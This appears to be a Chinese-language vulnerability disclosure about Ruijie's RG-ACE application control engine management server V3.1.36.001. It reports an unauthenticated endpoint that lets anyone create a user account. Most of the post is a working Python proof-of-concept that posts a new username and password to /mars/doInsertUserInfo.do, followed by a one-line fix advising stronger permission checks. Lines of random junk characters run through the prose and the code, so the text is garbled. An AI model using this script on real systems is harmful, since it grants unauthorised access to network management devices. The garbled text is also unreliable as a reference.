锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
' \+ S: n, [6 Z, q0 V  J
( P. N% A% D+ C/ H3 }7 P6 b( D! }
测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
) T: F( _3 a+ z6 E! {编译时间: 201104291730
3 G- K* @$ s( D6 T  Z
9 o3 Y- K. s$ Q2 j
1 m5 m, M# p$ I4 f/ A8 t漏洞证明：
) Q/ E% @1 j0 S& |9 ]

5 b4 V# z& ?$ q0 M' o; R; w
) ]) z( M/ s" P$ |# ?& v
+ u/ d% d, f6 ]+ G
' M" y( u8 D5 A& c9 T& v* S
执行脚本
#! /usr/bin/env python
#coding=gbk
7 R7 i5 C( N; x$ M2 C#RG-ACE管理服务器 V3.1.36.001
3 w/ s1 {3 s8 Qimport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
' @& s  k: R0 }opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
5 e5 H" y* F3 @  `# d6 p  _post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
. K" M) u( W9 Y% ]# g7 t6 Z("userName","t"), #######账号自己加
( ~) @2 {, n2 b' p("pwd","aaaaaa"),######密码自己加
! Q" |; e% v1 z) |("trueName","ad"),
("email",""),
, S( u' M& T# z: h( b. }# O$ J# S("mobilePhone",""),
# y+ Q3 P! O5 w/ O8 H3 s  n5 u8 f("officePhone",""),
("addr",""),
("submit","确定"))
4 ]$ b  Z- Q+ _# w# t) a, z2 q( R+ z5 Eurllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
: g4 s+ Z2 J/ ~' c2 Xprint "Done"
7 b5 l: L& s* M8 i
7 y9 n& N5 e7 X- {' d7 r- `4 h! E登录，连接设备

. J# s; X9 Q: x0 ^


. x% r% D) D' q, A
默认的管理员admin权限更大点
! m6 \" z# v, x; p1 ^, e" D


/ V( T# W( C: T( R9 C
; X6 J, o9 B# _  X. D& l3 s
修复方案：
加强对接口的权限验证
$ [/ J* g- K; q' E) A% E- ?
& g. M/ O- b( c' T4 ~- P+ J" e! N8 K